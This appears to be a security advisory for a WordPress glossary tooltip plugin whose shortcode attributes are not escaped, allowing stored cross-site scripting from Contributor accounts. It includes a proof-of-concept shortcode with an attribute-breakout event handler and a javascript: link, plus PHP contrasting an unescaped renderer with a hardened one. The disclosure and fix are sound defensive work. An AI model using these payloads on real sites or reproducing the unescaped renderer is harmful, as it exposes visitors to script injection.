The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.
[glossary_tooltip dashicon='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//' link="javascript:alert(/XSS-enhanced-tooltipglossary_link/)"]Click me[/glossary_tooltip]
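
The missing escaping, shown as an added example that is not the plugin's code: a hypothetical renderer in its unescaped and hardened forms, run on the attribute values from the shortcode above. It assumes dashicon is placed in a class attribute and link in an href. All function names are hypothetical; inside WordPress, sanitize_html_class(), esc_url() and esc_attr() are the core helpers for these jobs.

```php
<?php
// Added example: hypothetical renderer, not the plugin's code.
// Assumption: dashicon lands in a class attribute, link in an href.
const ALLOWED_SCHEMES = ['http', 'https'];

// Keep only characters that are valid in a CSS class token.
function safe_class(string $value): string
{
    return (string) preg_replace('/[^A-Za-z0-9_-]/', '', $value);
}

// Return the URL if it is relative or uses an allowed scheme, else ''.
function safe_url(string $value): string
{
    // Drop whitespace and control characters, which browsers may ignore
    // in a URL, so "java\tscript:" cannot slip past the scheme check.
    $url = (string) preg_replace('/[\x00-\x20]+/', '', $value);
    if (preg_match('/^([a-z][a-z0-9+.-]*):/i', $url, $m)
        && !in_array(strtolower($m[1]), ALLOWED_SCHEMES, true)) {
        return '';
    }
    return $url;
}

// Unescaped form: attribute values are concatenated into markup as-is.
function render_vulnerable(array $atts, string $content): string
{
    return '<a href="' . $atts['link'] . '"><span class="dashicons '
        . $atts['dashicon'] . '"></span>' . $content . '</a>';
}

// Hardened form: each value is validated, then escaped for its context.
function render_hardened(array $atts, string $content): string
{
    $class = safe_class($atts['dashicon']);
    $href  = htmlspecialchars(safe_url($atts['link']), ENT_QUOTES, 'UTF-8');
    $text  = htmlspecialchars($content, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $href . '"><span class="dashicons ' . $class
        . '"></span>' . $text . '</a>';
}

// Attribute values copied from the shortcode on this page.
$atts = [
    'dashicon' => '" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//',
    'link'     => 'javascript:alert(/XSS-enhanced-tooltipglossary_link/)',
];
echo render_vulnerable($atts, 'Click me'), "\n";
echo render_hardened($atts, 'Click me'), "\n";
```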